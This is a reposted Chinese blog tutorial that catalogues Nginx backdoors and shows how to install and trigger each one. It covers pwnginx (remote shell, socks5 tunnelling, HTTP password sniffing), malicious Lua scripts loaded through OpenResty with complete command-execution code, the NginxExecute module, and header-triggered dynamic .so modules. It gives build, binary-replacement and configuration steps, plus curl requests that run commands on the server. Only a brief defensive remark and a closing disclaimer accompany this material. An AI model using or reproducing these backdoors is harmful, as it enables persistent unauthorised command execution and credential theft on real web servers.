自学内容网 自学内容网

Nginx后门集合

保姆级学习当前已知的Nginx后门

简介

目前的nginx后门根据加载方式来分有两类: 动态库模块(so module)和二进制nginx程序。

顾名思义,动态库模块就是后门作为nginx模块(so module)加载,本身不改变nginx程序;第二类则是先通过编译加入后门代码的nginx,然后替换掉目标nginx程序来加载。两种方式各有优劣,具体还要看攻击场景,从防护角度来看,对于模块、进程、nginx相关的可执行文件都应该进行检查。

Nginx环境搭建

nginx下载地址:http://nginx.org/download/nginx-1.17.9.tar.gz

cd /usr/local/src/
wget <http://nginx.org/download/nginx-1.17.9.tar.gz>
tar zxvf nginx-1.17.9.tar.gz
cd nginx-1.17.9
./configure --with-http_stub_status_module
make && make install

默认安装路径如下:

图片

以上安装nginx时若出现以下报错,则需要预先安装PCRE包,PCRE作用是让Nginx支持Rewrite功能

图片

cd /usr/local/src/
wget <http://downloads.sourceforge.net/project/pcre/pcre/8.39/pcre-8.39.tar.gz>
tar zxvf pcre-8.39.tar.gz
./configure
make && make install
pcre-config --version //验证是否成功安装PCRE

资料参考:https://www.runoob.com/linux/nginx-install-setup.html

pwnginx

pwnginx是一个在11年前发布在github上的开源项目https://github.com/t57root/pwnginx

其后门功能如下:

  • 远程shell访问

    通过客户端控制 ./pwnginx shell [ip] [port] [password]

  • 通过已有的http连接建立socks5隧道

    通过客户端控制 ./pwnginx socks5 [ip] [port] [password] [socks5ip] [socks5port]

  • http 密码嗅探与记录(内容保存在/tmp/.web_sniff文件中)

可以通过client来控制被植入pwnginx的服务器,还可以支持socks5代理。项目包括pwnginx客户端和后门module模块,我们可以预先解压并编译客户端

cd client
make

编译后门

在机器上编辑nginx的编译源文件,在src/core/nginx.c中的configure arguments:在后面添加--prefix=/usr/local/nginx\\n,指定的是nginx安装的目录,如果当前机器存在nginx安装目录也可覆盖

图片

此时重新编译nginx并添加后门module模块

./configure --prefix=/usr/local/nginx/ --add-module=/tools/pwnginx-master/module
make

此时将新编译好的nginx覆盖原有的nginx

cp -f objs/nginx /usr/local/nginx/sbin/nginx

图片

运用该后门需要重新启动nginx

killall nginx
/usr/local/nginx/sbin/nginx

此时就可以利用pwnginx客户端进行后门连接

./pwnginx shell 目标机 nginx端口 密码 默认密码是t57root,密码的配置文件在module\config.h文件夹中,可在重新编译nginx前修改密码

图片

lua后门

nginx的lua-nginx-module可以加载lua脚本,可以利用lua脚本来增强nginx的功能。当前lua+nginx集成的中间件有OpenResty和Tengine,而lua在nginx的作用可以是处理高并发,也可以用作waf、代理等作用,攻击者可将恶意的lua脚本加载到nginx,从而可以执行任意系统命令、接管系统

nginx处理流程

先来了解下nginx的处理阶段

图片

常用到的阶段如下:

  1. init_by_lua*: 启动阶段初始化

  2. set_by_lua*: 流程分之处理判断变量初始化

  3. rewrite_by_lua*: 转发、重定向、缓存等功能(例如特定请求代理到外网)

  4. access_by_lua*: IP准入、接口权限等情况集中处理(例如配合iptable完成简单防火墙)

  5. content_by_lua*: 内容生成

  6. header_filter_by_lua*: 应答HTTP过滤处理(例如添加头部信息)

  7. body_filter_by_lua*: 应答BODY过滤处理(例如完成应答内容统一成大写)

  8. log_by_lua*: 回话完成后本地异步完成日志记录(日志可以记录在本地,还可以同步到其他机器)

环境搭建

这边选择一个相对方便的环境,例openresty源码包或二进制安装包

wget <https://openresty.org/download/openresty-1.15.8.1.tar.gz>
tar zxvf openresty-1.15.8.1.tar.gz
cd openresty-1.15.8.1
./configure
gmake
gmake install

此时默认去/usr/local/openresty/nginx/sbin/路径下启动nginx

图片

content阶段放置后门

方式一:

创建一个放置lua脚本的目录,随后在nginx.conf文件中的http节中加入如下内容,用于加载lua文件:

http {
  include       mime.types;
  # lua 文件的位置
  lua_package_path "/usr/local/openresty/nginx/conf/lua/?.lua;;";
  # nginx启动阶段时执行的脚本,可以不加
  init_by_lua_file '/usr/local/openresty/nginx/conf/lua/init.lua';

conf/lua_src/Init.lua中的内容如下:

local p = "/usr/local/openresty/nginx/conf/lua"
local m_package_path = package.path
package.path = string.format("%s?.lua;%s?/init.lua;%s", p, p, m_package_path)
cmd = require("t")

cmd = require("t")表示加载了t.lua中的模块,并命名为cmd,以后在nginx的所有执行阶段通过cmd变量就可以调用了。 t.lua实现了一个简单的命令执行功能,如下所示:

local _M = {}
function _M.run()
    ngx.req.read_body()
    local post_args = ngx.req.get_post_args()
    local cmd = post_args["cmd"]
    if cmd then
        f_ret = io.popen(cmd)
        local ret = f_ret:read("*a")
        ngx.say(string.format("reply:\\n%s", ret))
    end
end
return _M

以上操作配置lua脚本路径,并在nginx.conf中指定location去加载lua脚本中的恶意函数

location /a/ {
    content_by_lua 'cmd.run()';
}

之后执行nginx -s reload重载nginx并请求后门url

图片

curl [http://192.168.142.137/a/](http://192.168.142.137/a/) -d "cmd=id"

图片

方式二:

在html目录下放置任意文件即指定后门url路径,在nginx.conf中添加content_by_lua_file参数为lua后门文件

location = /a.html {
     default_type 'text/plain';
     content_by_lua_file '/usr/local/openresty/nginx/conf/lua/t2.lua';
}

t2.lua内容如下

ngx.req.read_body()
local post_args = ngx.req.get_post_args()
local cmd = post_args["cmd2"]
if cmd then
    f_ret = io.popen(cmd)
    local ret = f_ret:read("*a")
    ngx.say(string.format("%s", ret))
end

图片

content_by_lua*更多参数用法可参考:https://blog.csdn.net/jll126/article/details/123822646

以上仅展示了用作命令执行的后门,只要服务器的lua模块足够强大,其实可以配合nginx处理阶段做更多操作。

nginx execute

https://github.com/limithit/NginxExecute

该后门利用nginx的ngx_http_execute,从而达到执行任意系统命令的目的。攻击者可以通过特定的请求即可执行任意系统命令。 需要重新编译nginx并添加后门module模块

./configure --prefix=/usr/local/nginx/ --add-module=/tools/NginxExecute-1.6.1
make

图片

此时将新编译好的nginx覆盖原有的nginx

cp -f objs/nginx /usr/local/nginx/sbin/nginx

运用该后门需要重新启动nginx,启动前需要修改nginx.conf文件,在location中添加command on;

图片

现在,之后执行nginx -s reload重载nginx,此时通过访问curl -g "http://192.168.142.137/?system.run[ifconfig]”

可以看到结果,貌似有错

图片

那接下来看看源码是什么问题

图片

修改后重复以上操作再次访问恶意url,可以看到命令执行结果

图片

nginx header后门

跟上者不同的是对于请求内容来说,驻留后门的位置不一样。驻留该后门的方式与上者大致相同

https://github.com/veo/nginx_shell

https://github.com/vgo0/nginx-backdoor

这两个项目都是不错的poc,也已经提供了完整的so模块,但是利用起来跟nginx编译版本有关,建议是重新根据nginx版本编译

方式一:

和上者一样使用--add-module将模块结合nginx重新编译并替换nginx

方式二:

nginx在1.9.11版本后开始支持动态加载模块,也就是说我们将编译好的二进制so模块在nginx.conf文件中引用即可。先根据服务器nginx自行编译so模块,./configure要与nginx编译环境一致

./configure --add-dynamic-module=/tools/nginx-backdoor-master
make modules
strip -s objs/ngx_http_secure_headers_module.so
cp objs/ngx_http_secure_headers_module.so /usr/local/nginx/conf/modules/ngx_http_secure_headers_module.so

现在将文件**ngx_http_secure_headers_module.so**拷贝到目标机器nginx的modules目录下,修改目标nginx总配置文件nginx.conf,在最外层代码层添加:

load_module /usr/local/nginx/conf/modules/ngx_http_secure_headers_module.so

随后重载nginx,执行curl -H "vgo0: whoami" [<http://192.168.142.137>](<http://192.168.142.137/>)

图片

更多网络安全优质免费学习资料与干货教程看主页简介加v。

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。


原文地址:https://blog.csdn.net/2301_80127209/article/details/140605065

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!